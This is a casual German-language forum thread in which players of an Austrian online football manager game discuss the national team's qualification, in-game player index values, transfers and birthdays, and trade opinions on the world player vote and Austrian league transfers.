Liechtenstein: Da darf man, im Gegensatz zu Schweden, ned stolpern. Aktuell stehen sie aber ssssehr gut in der Tabelle da. Das ist mMn die größere Überraschung als Ö als #1. ;-)
So oft, wie Schweden und Russland schon wichtige Punkte gegen vermeintliche Nachzügler liegen gelassen haben, muss Österreich einfach die Quali schaffen!!!
Da sie auch ohne diese Vorlage aufgrund der Teilnehmererhöhung für die EM sowieso schon knapp aber doch eigentlich die Quali schaffen sollten, ist es jetzt fast Pflicht.
Bin gespannt, wer 3. wird!? Schweden und Russland haben schon sehr viele X, da wirds schwer über die Punkte als 3. noch dabei zu sein. Für Ö ist es aber gut, dass aus Topf 1 ein schlagbarer Gegner gelost wurde. :cool:
=> Jetzt müsste schon sehr viel Pech passieren, dass sie noch auf den 3.Platz zurückfallen.
Der Bonus: Jetzt wo die Auswärtsspiele kommen, ist das Pressing noch besser geeignet, wenn der Gegner (Schweden bzw Russland) gezwungen ist 3 Punkte einzufahren!
So extrem ist der HV auch wieder ned, wie ihr befürchtet. Er hilft deutlich weniger als bei dbdT.
PS: Janko freut sich vielleicht sogar mal "NUR" bis Russland zurück in der Zeit fliegen zu müssen. :mrgreen:
Stiffler
18.11.2014, 17:26
Ich zitier jetzt mal der Übersichtlichkeit halber nicht sondern greife nur auf.
Im ersten Posting hattest geschrieben, dass du nicht verstehst weshalb Alaba immer noch in der Dreierkette (Verteidigung) gebraucht wird.
Das glaub ich dir allerdings nicht. Das weißt du sehr genau.
Zum einen haben wir keinen annähernd guten Spieler auf dieser Position.
Zum anderen spielen wir mittlerweile oftmals so flexibel und dominant, dass wir Alaba zwar nominell als dritten Abwehrspieler führen, im Endeffekt aber einen fünften oder sechsten MF Spieler haben.
Und man darf nicht vergessen wer im Mittelfeld von Bayern München sonst noch so spielt :lol:
Allerdings keiner der das nötige Anforderungsprofil so erfüllt: siehe:
Aus einer Schwäche Dank eines Alaba´s eine Stärke gemacht, flexibel interpretiert, aufgrund seiner physischen Stärke mit Aufgaben überall am Feld betreut: Der läuft hinten ab, baut mit auf, leitet über die Mitte und über außen mit ein und schließt ab.
Mit 22 ;-)
DAS österreichische Jahrhunderttalent schlechthin
shadow08
18.11.2014, 23:12
So extrem ist der HV auch wieder ned, wie ihr befürchtet. Er hilft deutlich weniger als bei dbdT.
Der HV vielleicht nicht, aber unsere Auswärtsschwäche könnte entscheidend sein wenn wir die ned ablegen. ;)
Commander
25.11.2014, 18:37
Mein ehemaliger STAR Stürmer ist zurück bei der Garde und darf nun hier seine aktive Karriere beenden!!
Welcome back " Super Mario " :kette::kette:
terminator85
25.11.2014, 18:45
Mein ehemaliger STAR Stürmer ist zurück bei der Garde und darf nun hier seine aktive Karriere beenden!!
Endlich mal, dass du ihn ned masslos überteuert eingekauft hast. :-)
=> Musst nur noch hoffen, dass er noch einige Jährchen anhängt.
Wünsch dir viel Spass und Erfolg mit ihm! ;-)
Commander
25.11.2014, 19:02
Endlich mal, dass du ihn ned masslos überteuert eingekauft hast. :-)
=> Musst nur noch hoffen, dass er noch einige Jährchen anhängt.
Wünsch dir viel Spass und Erfolg mit ihm! ;-)
Ja hast recht, aber fürs alter is er trotzdem nicht billig gewesen :-)
Aber mir war fad, und geld hab ich auch zu viel :-) :-)
shadow08
25.11.2014, 19:22
Hast ihn dir also doch geholt. ;) :thumb:
terminator85
25.11.2014, 20:04
Ja hast recht, aber fürs alter is er trotzdem nicht billig gewesen :-)
Aber mir war fad, und geld hab ich auch zu viel :-) :-)
Das Alter ists gar ned, was unangebracht ist. Der Preis auch ned. Seine Xp ist aber ned ganz das, was du brauchen würdest.
20 Xp hat er erst in fast 2 Saisonen. Spätestens da wird die Pension eine akute Frage werden.
=> Das Alter/Xp-Verhältnis passt ned.
Obwohl er ned in dein Team passt, passt er gut zu dir. Also passts schon, wenn dein Wunschspieler wieder bei dir aufläuft. ;-)
Commander
25.11.2014, 20:09
Das Alter ists gar ned, was unangebracht ist. Der Preis auch ned. Seine Xp ist aber ned ganz das, was du brauchen würdest.
20 Xp hat er erst in fast 2 Saisonen. Spätestens da wird die Pension eine akute Frage werden.
=> Das Alter/Xp-Verhältnis passt ned.
Obwohl er ned in dein Team passt, passt er gut zu dir. Also passts schon, wenn dein Wunschspieler wieder bei dir aufläuft. ;-)
War kein wunschspieler, hab ihn erst heute am TM gesehen :-)
Ja die xp könnte besser sein, aber ich hoff das die 3 da im sturm wirbeln werden :-)
Das sind die 3 Stürmer die mich in der OL halten sollen ;-)
http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=967988&code=8729761943bd1e54fac96c193706747f
http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=1080013&code=2ca2daeca88339fb42dce93307306a74
http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=973254&code=6cecf9ee752d63977074a6c1b9625ce2
Ps: vielleicht folgt auch noch ein coppe spieler ;-)
benlevent
25.11.2014, 20:54
Commander Gratuliere zu den 2 Spielern, sind sicher eine bereicherung für dein Team auch wenn es nicht die volle 20xp hat, zu dem sind diese Spieler auch noch extrem billig gegen über die Normalo spieler und wenn da nächste Saison nur einer nicht in pension geht hast dann sehr sehr günstig gekauft . Gratuliere.;-)
Commander
25.11.2014, 20:56
Commander Gratuliere zu den 2 Spielern, sind sicher eine bereicherung für dein Team auch wenn es nicht die volle 20xp hat, zu dem sind diese Spieler auch noch extrem billig gegen über die Normalo spieler und wenn da nächste Saison nur einer nicht in pension geht hast dann sehr sehr günstig gekauft . Gratuliere.;-)
Danke ;-)
Ja ich hoffe das mir wenigstens 2 erhalten bleiben :-)
problem ist nur das deine keine xp gewinnen :-?
Commander
25.11.2014, 21:15
problem ist nur das deine keine xp gewinnen :-?
Doch, 2 stürmer können immer spielen ;-)
Hab 11 junge + 2 stürmer geht sich aus
Commander
27.11.2014, 17:11
Wie läuft das mit den Index werten?
Welche fitness staffelungen haben da einfluss?
84% index mit 0 fitness, wie viel wäre das mit 10 fitness
terminator85
27.11.2014, 18:33
Wie läuft das mit den Index werten?
Welche fitness staffelungen haben da einfluss?
84% index mit 0 fitness, wie viel wäre das mit 10 fitness
2x 4% mehr => Das wären dann 92%! ;-)
Commander
27.11.2014, 18:38
2x 4% mehr => Das wären dann 92%! ;-)
Und das mit 25 jahren :shock:
terminator85
27.11.2014, 18:51
Und das mit 25 jahren :shock:
Das ist doch keine Frage des Alters.
Ich frag mich eher, warum es bei ganz dbdT grad mal eine Handvoll (*kA, wieviel es waren) Spieler geschafft haben, mal 100% in einem Spiel abzurufen. :roll:
Wo hat er gespielt (MF?)?
Commander
27.11.2014, 18:56
Das ist doch keine Frage des Alters.
Ich frag mich eher, warum es bei ganz dbdT grad mal eine Handvoll (*kA, wieviel es waren) Spieler geschafft haben, mal 100% in einem Spiel abzurufen. :roll:
Wo hat er gespielt (MF?)?
Naja, bezweifle das 21 jährige mit 84% index spielen ;-)
2 im MF und 1er in der VT
terminator85
27.11.2014, 19:02
Naja, bezweifle das 21 jährige mit 84% index spielen ;-)
2 im MF und 1er in der VT
Am Ende der Saison wärs schon -locker- möglich, wenn ich sehe, welche Skillmonster bei so manchem Umbauer geschaffen werden. ;-)
Gleich 3 :shock:
=> Dein Team ist wirklich super unterwegs. ;-)
Commander
27.11.2014, 19:03
Am Ende der Saison wärs schon -locker- möglich, wenn ich sehe, welche Skillmonster bei so manchem Umbauer geschaffen werden. ;-)
Ganz so wirds nicht sein aber bin gespannt was ben seine haben ;-)
Der hat monster im kader :-)
terminator85
27.11.2014, 19:14
Ganz so wirds nicht sein aber bin gespannt was ben seine haben ;-)
Der hat monster im kader :-)
Wennst davon ausgehst, dass so ein Spieler schon 6 gute Lehrjahre hatte, sind 40 A-Skills und 30 B-Skills sicher drinnen. Bei 15 Startskills ist das keine allzu große Herausforderung.
Nimmst dann noch 8% dazu, weil der Spieler sich viel ausrastet (es sagt ja keiner, dass alle immer spielen müssen :-P), hättest schon so einen Spielerindex beisammen. ;-)
Passt dann auch noch die Moti des Spielers ist der Index sogar noch höher. 8-)
btw: Deine Hochindexspieler haben sicher gute Motiwerte (15+), oder!?
Commander
27.11.2014, 19:21
Wennst davon ausgehst, dass so ein Spieler schon 6 gute Lehrjahre hatte, sind 40 A-Skills und 30 B-Skills sicher drinnen. Bei 15 Startskills ist das keine allzu große Herausforderung.
Nimmst dann noch 8% dazu, weil der Spieler sich viel ausrastet (es sagt ja keiner, dass alle immer spielen müssen :-P), hättest schon so einen Spielerindex beisammen. ;-)
Passt dann auch noch die Moti des Spielers ist der Index sogar noch höher. 8-)
btw: Deine Hochindexspieler haben sicher gute Motiwerte (15+), oder!?
2x 18er Moti und 1x 20er Moti ;-)
Aber die anderen Spieler haben auch 80% index :-)
benlevent
27.11.2014, 19:33
So sehen die bei mir Index aus .
Der Leader mit 120Skill in der verteidigung 80%(Moti 13)
Der skill schwächste Siegmund Ralph 72% im sturm (def skill 40, mfSkill gesamt 32 offskill 37) Moti bei 11.
Und der andere Jeff Adrian (mit Abschlussstärke und wenig defskill25 Mf skill 33, Offskill 39 und ist für sturm gedacht und hat im MF gespielt 72% moti 12
Die 3 88% spieler haben 115 Zier moti 16, Wulf 116Skill moti 15, Stratege 115 Skill Moti 15.
Ich denke mit Fitness 9-10 ohne moti ist 96% index möglich.
http://img5.fotos-hochladen.net/uploads/indexkadergn7ed5r91a.png (http://www.fotos-hochladen.net)
Commander
27.11.2014, 19:37
So sehen die bei mir Index aus .
Der Leader mit 120Skill in der verteidigung 80%(Moti 13)
Der skill schwächste Siegmund Ralph 72% im sturm (def skill 40, mfSkill gesamt 32 offskill 37) Moti bei 11.
Und der andere Jeff Adrian (mit Abschlussstärke und wenig defskill25 Mf skill 33, Offskill 39 und ist für sturm gedacht und hat im MF gespielt 72% moti 12
Die 3 88% spieler haben 115 Zier moti 16, Wulf 116Skill moti 15, Stratege 115 Skill Moti 15.
Ich denke mit Fitness 9-10 ohne moti ist 96% index möglich.
http://img5.fotos-hochladen.net/uploads/indexkadergn7ed5r91a.png (http://www.fotos-hochladen.net)
Aber echt arg was da für unterschiede herschen, hätte scho gedacht das deine mehr index haben
terminator85
27.11.2014, 19:38
2x 18er Moti und 1x 20er Moti ;-)
Aber die anderen Spieler haben auch 80% index :-)
In ein paar Tagen sind die Indexwerte also nicht mehr so gut.
Der mit 20er Moti ist der VT?
Bin mir selbst ned sicher, ob Moti 20 mehr bewirkt als 15 oder 18!? :-?
Meine sind ja kaum so weit raufgestiegen, weil die Konkurrenz zu stark dazu war. ;-)
Commander
27.11.2014, 19:41
In ein paar Tagen sind die Indexwerte also nicht mehr so gut.
Der mit 20er Moti ist der VT?
Bin mir selbst ned sicher, ob Moti 20 mehr bewirkt als 15 oder 18!? :-?
Meine sind ja kaum so weit raufgestiegen, weil die Konkurrenz zu stark dazu war. ;-)
Nein, der VT hat 18 moti, der MF hat 20 moti
Aber die mit dem höchsten index sind nicht mal die skill und xp stärksten
terminator85
27.11.2014, 19:53
Nein, der VT hat 18 moti, der MF hat 20 moti
Aber die mit dem höchsten index sind nicht mal die skill und xp stärksten
Gut zu wissen.
Beim Index spiel soviel rein. Xp ist egal; Skills, Moti und Fitness sind entscheidend.
...und das entscheidenste ist: Wechselt jemand im Spiel mal die Position, wird sein neuer (=aktueller/tatsächlicher) Index angezeigt und der ist für solche "Schwanzvergleiche" gleich nicht mehr zu gebrauchen, weil er deutlich kleiner ist. ;-):-P
terminator85
27.11.2014, 19:57
Aber echt arg was da für unterschiede herschen, hätte scho gedacht das deine mehr index haben
@Chris: Die bei dir besonders hohe Moti macht den Unterschied! ;-)
@Ben: Die Kunst ist es Moti und Fitness gleichzeitig zu pushen. Da wirds dann lustig, was den Index angeht. Über 100% sind, wenn die Skills passen, rechnerisch leicht möglich. Ich weiß nur ned, ob es die Engine hergibt/anzeigt. :lol:
Commander
27.11.2014, 19:57
Gut zu wissen.
Beim Index spiel soviel rein. Xp ist egal; Skills, Moti und Fitness sind entscheidend.
...und das entscheidenste ist: Wechselt jemand im Spiel mal die Position, wird sein neuer (=aktueller/tatsächlicher) Index angezeigt und der ist für solche "Schwanzvergleiche" gleich nicht mehr zu gebrauchen, weil er deutlich kleiner ist. ;-):-P
Hhmm??
Einer mit 84 index wurde ausgewechselt, und der andere mit 84 index wurde eingewechselt
terminator85
27.11.2014, 20:32
Hhmm??
Einer mit 84 index wurde ausgewechselt, und der andere mit 84 index wurde eingewechselt
Bisher haben die meisten (zB Faby) berichtet, dass im MF die besten Indexwerte geschafft wurden. Wenns bei dir ein VT schafft gleich gut zu sein, ists interessant. ;-)
Ein/Auswechseln ist egal; Positionswechsel machen den angezeigten Index kaputt! ;-)
Commander
27.11.2014, 20:38
Bisher haben die meisten (zB Faby) berichtet, dass im MF die besten Indexwerte geschafft wurden. Wenns bei dir ein VT schafft gleich gut zu sein, ists interessant. ;-)
Ein/Auswechseln ist egal; Positionswechsel machen den angezeigten Index kaputt! ;-)
Ok, pos wechsel hab ich keinen durchgeführt, und der VT hat auch durchgespielt
Das ist der besagte VT:
http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=2216037&code=b8b7d94032a3c46fcb44371fe07f3fbd
alles gute zum Geburtstag Chris :party:
Commander
03.12.2014, 09:27
alles gute zum Geburtstag Chris :party:
Dankeschön :-)
terminator85
03.12.2014, 09:41
@Chris: Auch von mir ALLES GUTE zum Geburtstag! ;-)
Heute kann es regnen, STURMen oder schneien, ... :-D
=> Viel Spass beim Feiern! :party::th_alc::banane:
Commander
03.12.2014, 10:14
@Chris: Auch von mir ALLES GUTE zum Geburtstag! ;-)
Heute kann es regnen, STURMen oder schneien, ... :-D
=> Viel Spass beim Feiern! :party::th_alc::banane:
Leichter scheefall war heut eh schon ;-)
shadow08
03.12.2014, 10:29
Alles Gute Chris, der 30er naht in großen Schritten! :lol:
:prost::kette:
terminator85
03.12.2014, 10:45
Erinnere mich ned daran. :roll:
Hab extra nach 14-15j gesucht, nachdem sich die Ü30 Säcke von mir nix mehr sagen haben lassen. :mrgreen:
...ABER dank dir komm ich mir jetzt wieder sehr alt vor. :-(
btw: Bin grad am überlegen, welche 7 von 9 ich ziehen soll? :-?
shadow08
03.12.2014, 10:50
Erinnere mich ned daran. :roll:
Hab extra nach 14-15j gesucht, nachdem sich die Ü30 Säcke von mir nix mehr sagen haben lassen. :mrgreen:
...ABER dank dir komm ich mir jetzt wieder sehr alt vor. :-(
btw: Bin grad am überlegen, welche 7 von 9 ich ziehen soll? :-?
Haha gern geschehen :-P
ich hab schon auf 7 ausgemustert somit hab ichs ned schwer, aber ich würd schon gern die Ersten ziehen
Commander
03.12.2014, 10:51
Danke, danke.... :-)
Ja er naht ;-)
shadow08
03.12.2014, 11:53
Habts ihr schon mal einen 40 Jährigen gesehen?
Im Burgenland Kader gibts einen. :)
terminator85
03.12.2014, 11:59
Haha gern geschehen :-P
ich hab schon auf 7 ausgemustert somit hab ichs ned schwer, aber ich würd schon gern die Ersten ziehen
Die original "Ersten" (Nüsse) werden bei mir gezogen. :lol:
Heuer erspar ich mir wenigstens den Stress, gleich mal schnell ziehen und am TM werfen zu "müssen".
Grad heuer, wo ich mal zufällig Zeit dazu hätte. ;-)
@Alex: Viel Spass beim Ziehen! Vielleicht ist ja für mich was dabei?
btw: Wenn ich mich recht erinnere, gabs seeeeehr vereinzelt 16j, die ohne Ligaspiel gleich mal zu Saisonstart 1,6 Xp hatten (Das ist aber nur für Akademiespieler möglich, die die vollen 36 Jugi-Spiele hatten, weil sie zu Beginn oder am 1.Spieltag der Saison als 14j geboren wurden). Sowas hat also äußersten seltenheitswert.
Diesmal wird geschaut, ob es sowas gibt! Gekauft werden andere. 8-)
shadow08
03.12.2014, 12:02
Die original "Ersten" (Nüsse) werden bei mir gezogen. :lol:
Heuer erspar ich mir wenigstens den Stress, gleich mal schnell ziehen und am TM werfen zu "müssen".
Grad heuer, wo ich mal zufällig Zeit dazu hätte. ;-)
@Alex: Viel Spass beim Ziehen! Vielleicht ist ja für mich was dabei?
btw: Wenn ich mich recht erinnere, gabs seeeeehr vereinzelt 16j, die ohne Ligaspiel gleich mal zu Saisonstart 1,6 Xp hatten (Das ist aber nur für Akademiespieler möglich, die die vollen 36 Jugi-Spiele hatten, weil sie zu Beginn oder am 1.Spieltag der Saison als 14j geboren wurden). Sowas hat also äußersten seltenheitswert.
Diesmal wird geschaut, ob es sowas gibt! Gekauft werden andere. 8-)
Glaub ned dass die was für dich sind. :-?
Ja auf solche 14j hoffe ich diesmal auch wieder, bin schon gespannt was morgen dabei sein wird.
terminator85
03.12.2014, 12:10
Habts ihr schon mal einen 40 Jährigen gesehen?
Im Burgenland Kader gibts einen. :)
Meine wollten ja ned so lang spielen!
Dass es möglich ist, ist eh schon lang klar! ;-)
Jetzt warte ich nur noch auf seinen Einsatz. Das wäre der blanke Hohn seinen jüngeren Kollegen gegenüber. :lol:
btw: Nur 19 Xp ist für das Alter schon eine Schande. :-P
shadow08
03.12.2014, 12:14
Meine wollten ja ned so lang spielen!
Dass es möglich ist, ist eh schon lang klar! ;-)
Jetzt warte ich nur noch auf seinen Einsatz. Das wäre der blanke Hohn seinen jüngeren Kollegen gegenüber. :lol:
btw: Nur 19 Xp ist für das Alter schon eine Schande. :-P
ja die 19XP haben mich auch gewundert, bis 40 sollte man doch locker auch ohne LB auf die 20 kommen :)
benlevent
03.12.2014, 12:14
Alles Gute Chris.:-);-);-)
terminator85
03.12.2014, 12:21
Glaub ned dass die was für dich sind. :-?
Ja auf solche 14j hoffe ich diesmal auch wieder, bin schon gespannt was morgen dabei sein wird.
Wieso ned? :boink:
Bin da sehr flexibel. ;-)
Es kommt aber auch darauf an, welche ich von den eigenen ziehe: http://666kb.com/i/cu25wperbad5ofq85.gif
Zur Info: Heckl, Palm und Feist sind Gekaufte. Alle anderen, die ned verkauft werden, sind von der Akademie.
Riek und Rustler haben Norm-Taks + pos.Spezi. Alle anderen haben Def-Taks.
Feist, Markert und Sack haben dazu noch positive Spezi.
=> Steininger, Markert und Feist werden sicher gezogen, aber welche 4 bekommen sonst noch die Chance sich bei mir zu bewiesen? :noidea:
shadow08
03.12.2014, 12:51
Wieso ned? :boink:
Bin da sehr flexibel. ;-)
Es kommt aber auch darauf an, welche ich von den eigenen ziehe: http://666kb.com/i/cu25wperbad5ofq85.gif
Zur Info: Heckl, Palm und Feist sind Gekaufte. Alle anderen, die ned verkauft werden, sind von der Akademie.
Riek und Rustler haben Norm-Taks + pos.Spezi. Alle anderen haben Def-Taks.
Feist, Markert und Sack haben dazu noch positive Spezi.
=> Steininger, Markert und Feist werden sicher gezogen, aber welche 4 bekommen sonst noch die Chance sich bei mir zu bewiesen? :noidea:
ok da würden meine doch dazu passen :)
sie haben halt ned die volle XP und sind keine Bglder
http://www.du-bist-der-teamchef.at/?...ec7df060af946e (http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=3441920&code=a82e5e5a0b155f040bec7df060af946e)
http://www.du-bist-der-teamchef.at/?...94f23966b7d805 (http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=3441918&code=62342ef9bfa1268f7694f23966b7d805)
Commander
03.12.2014, 13:02
Alles Gute Chris.:-);-);-)
Danke ben :-)
terminator85
03.12.2014, 13:19
ok da würden meine doch dazu passen :)
sie haben halt ned die volle XP und sind keine Bglder
http://www.du-bist-der-teamchef.at/?...ec7df060af946e (http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=3441920&code=a82e5e5a0b155f040bec7df060af946e)
http://www.du-bist-der-teamchef.at/?...94f23966b7d805 (http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=3441918&code=62342ef9bfa1268f7694f23966b7d805)
Sag ich ja. ;-)
Ist beides kein entscheidendes Kriterium.
=> Wenn die Akademie in der Südstadt, in Graz, in Barcelona oder ...wo auch immer... stehen würde, wärs mir genauso recht. 8-)
Umziehen geht halt ned so einfach. :-P
Volle Xp werd ich mir eher ned zukaufen. Höchstens 1-2 vielleicht, die wirkliche Toptalente sind (mit voller Xp), sonst reicht solides Mittelmass. :lol:
...ABER schaun ma mal, wie sich meine Vorstellungen mit dem Markt vertragen. Hab ja noch nie frische 16j zusammengekauft. :lol:
Der Manke würde aktuell ideal in mein Team passen. Der wäre sogar schon von der 1.Std an ein richtiger Takspusher der zum Trainer passt. :lol: Langfristig ist so eine Monstertak mMn schwachsinnig.
Der wird dir einiges einbringen bei den (A-)Skill-geilen-Usern. :thumb:
Der andere ist auch ganz gut, passt bei mir aber ned rein.
PS@Ben: Hab eine gute Nachricht für dich. Ein Steirer (Feist) ist wahrscheinlich bei mir dabei. Da könnte ja ein kleiner Terminator daraus werden. :lol:
Stiffler
03.12.2014, 15:46
Happy Birthday Chris :prost:
Commander
03.12.2014, 18:39
pumphose
03.12.2014, 19:16
...von mir auch Alles Gute, Glück und Gesundheit!!!!;-):-D
Lg.Pumpi8-)
Commander
03.12.2014, 19:28
...von mir auch Alles Gute, Glück und Gesundheit!!!!;-):-D
Lg.Pumpi8-)
Ps: gott sei dank wünscht du mir keine Niederlagen :-)
shadow08
03.12.2014, 19:49
Ps: gott sei dank wünscht du mir keine Niederlagen :-)
dafür sorgst eh selbst :-P
Commander
03.12.2014, 19:56
dafür sorgst eh selbst :-P
Alex, heut bitte ned :lol::lol:
shadow08
03.12.2014, 20:03
Alex, heut bitte ned :lol::lol:
sind eh nur noch 3 Stunden :-P
ich bin jetz übrigens wieder zurück in der 1. UL, aber leider bin ich ned in der 13er gelandet wo alles anfing :)
Commander
03.12.2014, 20:07
sind eh nur noch 3 Stunden :-P
ich bin jetz übrigens wieder zurück in der 1. UL, aber leider bin ich ned in der 13er gelandet wo alles anfing :)
Stimmt, das ehemalige 13er war der beginn von etwas großem :-) :-)
ja von einer Kopie :mrgreen:
shadow08
03.12.2014, 20:14
ja von einer Kopie :mrgreen:
unser 13er ist ned so schlecht wie des 18er also ist es keine Kopie :-P
aber jetz habi grad wieder gesehen wer des 18er erstellt hat, kein Wunder dass dort nur Schrott landet :lol:
nix gegen den User, aber sein Teamname...
unser 13er ist ned so schlecht wie des 18er also ist es keine Kopie :-P
aber jetz habi grad wieder gesehen wer des 18er erstellt hat, kein Wunder dass dort nur Schrott landet :lol:
nix gegen den User, aber sein Teamname...
so schlecht kann es ned sein wenn du auch unter Treffen, Eveents, Meetings gegangen bist und so wenig hast dort auch ned geschrieben ;-)
Ob RB oder SVS beides von Salzburg :-P
shadow08
03.12.2014, 20:39
so schlecht kann es ned sein wenn du auch unter Treffen, Eveents, Meetings gegangen bist und so wenig hast dort auch ned geschrieben ;-)
Ob RB oder SVS beides von Salzburg :-P
:keule: hier fehlt eindeutig ein 'Watschen'-Smiley :twisted:
am besten in Kombi mit dem: https://www.youtube.com/watch?v=Ik5re5k4Gxs
Stiffler
03.12.2014, 20:57
Wer isn dieser ronnymau eigentlich?
shadow08
03.12.2014, 20:58
Wer isn dieser ronnymau eigentlich?
das fragst uns?
ich schätz mal der wird eher bei euch bekannt sein, wenn überhaupt!?!?
am besten in Kombi mit dem: https://www.youtube.com/watch?v=Ik5re5k4Gxs
so sind´s wenn Sie nicht mehr weiter wissen dann Drohens mit Schläge 8-)
Stiffler
03.12.2014, 21:06
das fragst uns?
nö :mrgreen:
Wichitg ist ja auch nur ob er Punschen (http://forum.du-bist-der-teamchef.at/showthread.php?t=70021)kommt :lol::lol::lol::lol:
Stiffler
03.12.2014, 21:06
so sind´s wenn Sie nicht mehr weiter wissen dann Drohens mit Schläge 8-)
Der Chinese meinst du :mrgreen:
shadow08
03.12.2014, 21:09
nö :mrgreen:
Wichitg ist ja auch nur ob er Punschen (http://forum.du-bist-der-teamchef.at/showthread.php?t=70021)kommt :lol::lol::lol::lol:
der will dann sicher einen R..B...-Punsch :lol:
das fragst uns?
ne soviel ich weiß is der scho ewig nicht mehr aktiv ;-)
Der Chinese meinst du :mrgreen:
genau nix wie kopieren :pfeifen::wippe:
Stiffler
03.12.2014, 21:25
genau nix wie kopieren :pfeifen::wippe:
:nod: Strg+C wird ersetzt durch Strg+Axl
...hierbitteschön, eine kräftige Watschen fürn shadow08 :
http://www.asylboard.de/wcf/images/smilies/ohrfeige.gif
shadow08
03.12.2014, 21:58
danke die kommt gleich zum Einsatz
@Mane http://www.asylboard.de/wcf/images/smilies/ohrfeige.gif
ja :lol: hoffentlich wird der ned müde :mrgreen:
danke die kommt gleich zum Einsatz
@Mane http://www.asylboard.de/wcf/images/smilies/ohrfeige.gif
da Mane steht auf der richtigen Seite :mrgreen:
terminator85
03.12.2014, 23:40
Bevor ich in die falsche UL komm, sollt ich vielleicht versuchen erst gar ned so weit abzusteigen. :lol:
ne soviel ich weiß is der scho ewig nicht mehr aktiv ;-)
Ja, ohne Gallionsfigur gehts halt ned.
=> Bin ich froh, dass Alex immer noch fleissig seine http://www.asylboard.de/wcf/images/smilies/ohrfeige.gif einfängt (und austeilt)!
shadow08
05.12.2014, 11:11
@termi, falls du einen Bglder brauchst: http://www.du-bist-der-teamchef.at/?q=team/spielerdatenblatt&ID=3442500&code=0f29c9a7415466122f957dd9d8365d58
shadow08
14.01.2015, 11:28
Damit hier auch mal wieder was rein kommt.
http://www.krone.at/Oesterreich/Billa-Einbrecher_versteckte_sich_auf_Getraenkeregal-Sofort_ertappt-Story-434715
Ob das unser alter bekannter Buxi war? :lol::lol::lol:
terminator85
16.01.2015, 21:36
Damit hier auch mal wieder was rein kommt.
http://www.krone.at/Oesterreich/Billa-Einbrecher_versteckte_sich_auf_Getraenkeregal-Sofort_ertappt-Story-434715
Ob das unser alter bekannter Buxi war? :lol::lol::lol:
Der Buxi, wäre da sicher ausgebüxt! :mrgreen:
Zu anderen Themen:
1.) Sportlerwahl: Irgendwie war es abzusehen.
Messi hätte es sich ned verdient gehabt, obwohl er mit dem NT bei der WM so weit wie noch nie gekommen ist.
Bei Neuer ists eben so, dass TWs von vielen grundsätzlich nicht gewählt werden. Da reicht es dann einfach nicht zum Titel.
So wirklich eindeutig aufgedrängt hat sich diese Saison mMn aber keiner, da wurden eben die üblichen Verdächtigen gewählt und ein Weltmeister.
Ich finds schade, dass immer Off-Spieler gewählt werden. Wenig kreativ, einfach nach den geschossenen Toren (oder dem Naheverhältnis zu den Spielern) zu gehen. :-(
=> Mein persönliches Highlight bei diesen Wahlen war also die einmalige Ausnahme: Cannavaro! 8-)
2.) Jetzt hat sich es wieder mal bestätigt: Die Ö-Liga ist eine Ausbildungsliga!
So mancher Bulle, dazu so mancher kommender Leizig Bulle und viele, viele mehr werden von Sturm, Rapid, Austria und Admira einfach mal vekauft.
Es reicht oft in Ö einfach das eine oder andere Tor zu schießen und schon ist der MW -teils innerhalb einer halben Saison- ver5facht. :lol::lol::lol:
Bei Kampl bin ich echt gespannt, wie er sich in Dortmund tut.
Bei Sturm tut sich im Sturm auch einiges. :roll:
Die Rückkehrer (zum 0 Tarif) sind aber die eigentlichen "Helden".
Zulechner (letzten Sommer noch die heißeste Ö-Aktie) hat den Weg zurück gefunden. Davor schon unter anderem Royer und eine Liga weiter unten Drazan (also lauter Ex-NT-Spieler).
Hosiner (und Hinterseer) sind da heiße Kandidaten (aber erst in 1-2 Saisonen) ihnen zu folgen.
...und schon etwas her, aber etwas ganz besonderes: Der Rauswurf vom Milanic bei Leeds!
Die Kommentare vom Präsidenten waren einfach genial. Ein Monat später hat sich seine Meinung um 180° gedreht.
Ja die Weltfussballerwahl ist ein Witz.
Sieht man aber auch wer wen gewählt hat.
Hilft es wenn es geheim wäre? So würden vielleicht manche ehrlicher wählen, weil sie wissen, dass sie nicht "kontrolliert" werden. Diese "ich wähle meine Vereinsteamkollegen oder meine Nationalteamkollegen" finde ich fad. Und sehr schade. Der Modus ist einfach schlecht.
Es würde sich ja keiner trauen den "Gegner" zu wählen. Oder eben nicht seine "Freunde", weil es ja dann öffentlich ist und somit nachweislich belegbar, dass er den und den nicht gewählt hat.
Glaub dennoch dass es nicht wirklich helfen würde.
Ich würde mir eher ein Spielerwahl auf jeder Ebene. (Also Sturm, Mittelfeld, Verteidiger, Goalie) Die Verteidiger kommen halt zu kurz, weil diejenigen die den Assist geben oder die Torschützen halt diejenigen in den Medien sind.
bin da bei Termi. Mein Highlight auch noch immer Cannavaro. Ja Messi und Ronaldo sind beide tolle Fussballer, aber es hat schon einige Jahre gegeben wo es andere mehr verdient gehabt hätten als einer von den beiden.
Sonst seh ich das Thema Ö Liga auch wie termi.
Ausser bei Hinterseer. Ich glaub der packt das, solange er den Trainer hat.
teilweise tuts aber gut, dass RB nicht alle Spiele halten kann. So blöd es aber auch klingt. Damari der Austria wegkaufen ist gut. A) Diesen Preis würde die Austria NIRGENDSWO sonst erzielen können. Das Damari im Sommer sowieso gegangen wäre bei den Leistungen sehe ich als fix an. Wenn nicht, dann wäre er aber auch nicht gut genug gewesen. So läuft halt die Liga. Und das halt die "oberen" Vereine den unteren was wegkaufen ist halt so. Das ist das System.
terminator85
16.01.2015, 22:32
Glaub dennoch dass es nicht wirklich helfen würde.
Ich würde mir eher ein Spielerwahl auf jeder Ebene. (Also Sturm, Mittelfeld, Verteidiger, Goalie) Die Verteidiger kommen halt zu kurz, weil diejenigen die den Assist geben oder die Torschützen halt diejenigen in den Medien sind.
bin da bei Termi. Mein Highlight auch noch immer Cannavaro. Ja Messi und Ronaldo sind beide tolle Fussballer, aber es hat schon einige Jahre gegeben wo es andere mehr verdient gehabt hätten als einer von den beiden.
Sonst seh ich das Thema Ö Liga auch wie termi.
Ausser bei Hinterseer. Ich glaub der packt das, solange er den Trainer hat.
